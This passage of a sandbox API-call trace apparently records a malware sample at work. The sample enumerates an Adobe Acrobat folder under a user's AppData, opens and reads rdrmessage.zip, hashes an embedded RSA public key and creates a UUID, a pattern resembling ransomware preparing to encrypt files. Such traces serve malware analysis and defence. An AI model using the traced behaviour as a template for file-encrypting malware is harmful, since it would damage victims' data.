(pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\") returned="10.0\\" [0172.931] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f1c8 [0172.931] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0172.931] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\") returned="Acrobat\\" [0172.931] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0172.931] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0172.931] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f1c8 | out: hHeap=0xcd0000) returned 1 [0172.931] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0172.931] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a00 [0172.931] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0172.931] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0172.931] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cad8 [0172.931] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a00 | out: hHeap=0xcd0000) returned 1 [0172.931] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0172.931] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b57a80 [0172.931] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cad8 | out: hHeap=0xcd0000) returned 1 [0172.931] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0172.931] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b50 [0172.931] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0172.931] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0172.931] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b57a80 | out: hHeap=0xcd0000) returned 1 [0172.931] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0172.931] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0172.931] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0172.932] PathFindFileNameW (pszPath="") returned="" [0172.932] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0172.932] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe5b04330, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xe5b04330, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0172.933] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0172.933] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe5b04330, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xe5b04330, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0172.933] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd9b6a040, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd9b6a040, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xde963ca0, ftLastWriteTime.dwHighDateTime=0x1d2e625, nFileSizeHigh=0x0, nFileSizeLow=0xa5ff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rdrmessage.zip", cAlternateFileName="RDRMES~1.ZIP")) returned 1 [0172.933] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0172.933] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xd6) returned 0xdba388 [0172.934] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0172.934] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip") returned=".zip" [0172.934] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.934] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=42495) returned 1 [0172.934] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.937] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xa5d9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.937] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.939] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0172.939] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0172.939] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0172.939] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xa5ff, lpOverlapped=0x0) returned 1 [0172.940] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.940] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.940] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.940] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.940] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f1c8) returned 1 [0172.941] CryptCreateHash (in: hProv=0xd2f1c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.941] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.941] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.941] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.941] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.941] GetLastError () returned 0x0 [0172.941] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.941] CryptReleaseContext (hProv=0xd2f1c8, dwFlags=0x0) returned 1 [0172.941] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0172.941] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.941] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.941] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.941] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.941] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.941] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.941] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa600) returned 0x3b62d40 [0172.942] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0172.942] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0172.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0172.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b48820 [0172.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0172.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b57a80 [0172.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e7c0 [0172.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b57ac8 [0172.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e7d8 [0172.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e808 [0172.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddb8 [0172.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e820 [0172.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0172.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0172.942] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0172.942] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e808 | out: hHeap=0xcd0000) returned 1 [0172.942] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e820 | out: hHeap=0xcd0000) returned 1 [0172.942] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddb8 | out: hHeap=0xcd0000) returned 1 [0172.942] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0172.942] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48a18 | out: hHeap=0xcd0000) returned 1 [0172.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddb8 [0172.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd290 [0172.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e820 [0172.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0172.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x3b4e808 [0172.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd330 [0172.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0x3aa2470 [0172.943] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0172.943] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0172.943] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0172.943] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2588 [0172.943] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a50 [0172.943] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0172.943] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2470 | out: hHeap=0xcd0000) returned 1 [0172.943] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e820 | out: hHeap=0xcd0000) returned 1 [0172.943] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0172.943] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e808 | out: hHeap=0xcd0000) returned 1 [0172.943] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0172.943] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0172.943] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddb8 | out: hHeap=0xcd0000) returned 1 [0172.943] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0172.943] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0172.943] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0172.943] GetCurrentThreadId () returned 0x324 [0172.943] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0172.943] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0x3b54a00 [0172.943] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0172.943] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f1c8 [0172.943] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35ceae8 [0172.943] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0172.943] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0172.943] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35deb08 [0172.943] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0172.943] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0172.943] GetCurrentThreadId () returned 0x324 [0172.943] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0172.943] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0172.943] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0xd23a00 [0172.943] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0172.943] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0172.943] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0172.944] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0172.944] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0172.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0172.944] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0172.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cad8 [0172.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0172.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0172.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0172.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddb8 [0172.944] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0172.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0172.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0172.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0172.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0172.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0172.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0172.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0172.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e808 [0172.944] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0172.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2e0 [0172.944] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0172.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0172.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0172.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0172.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0172.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e820 [0172.944] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0172.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0172.944] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0172.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e7f0 [0172.944] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0172.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4ddd0 [0172.944] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0172.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd280 [0172.944] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0172.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dd70 [0172.944] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0172.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dde8 [0172.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0172.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e838 [0172.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dd70 | out: hHeap=0xcd0000) returned 1 [0172.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4dd70 [0172.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dde8 | out: hHeap=0xcd0000) returned 1 [0172.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2f0 [0172.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0172.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a10 [0172.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0172.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0172.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e808 | out: hHeap=0xcd0000) returned 1 [0172.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e808 [0172.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0172.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x204) returned 0x3b48a18 [0172.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddb8 | out: hHeap=0xcd0000) returned 1 [0172.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa2470 [0172.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dd70 | out: hHeap=0xcd0000) returned 1 [0172.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x210) returned 0x3b48c28 [0172.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0172.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10c) returned 0x3aa26a0 [0172.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0172.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa27b8 [0172.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e808 | out: hHeap=0xcd0000) returned 1 [0172.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x200) returned 0x3b48e40 [0172.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2470 | out: hHeap=0xcd0000) returned 1 [0172.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xdc53e8 [0172.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0172.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f1c8 | out: hHeap=0xcd0000) returned 1 [0172.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0172.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc53e8 | out: hHeap=0xcd0000) returned 1 [0172.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a10 | out: hHeap=0xcd0000) returned 1 [0172.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa27b8 | out: hHeap=0xcd0000) returned 1 [0172.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48c28 | out: hHeap=0xcd0000) returned 1 [0172.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48e40 | out: hHeap=0xcd0000) returned 1 [0172.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa26a0 | out: hHeap=0xcd0000) returned 1 [0172.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, 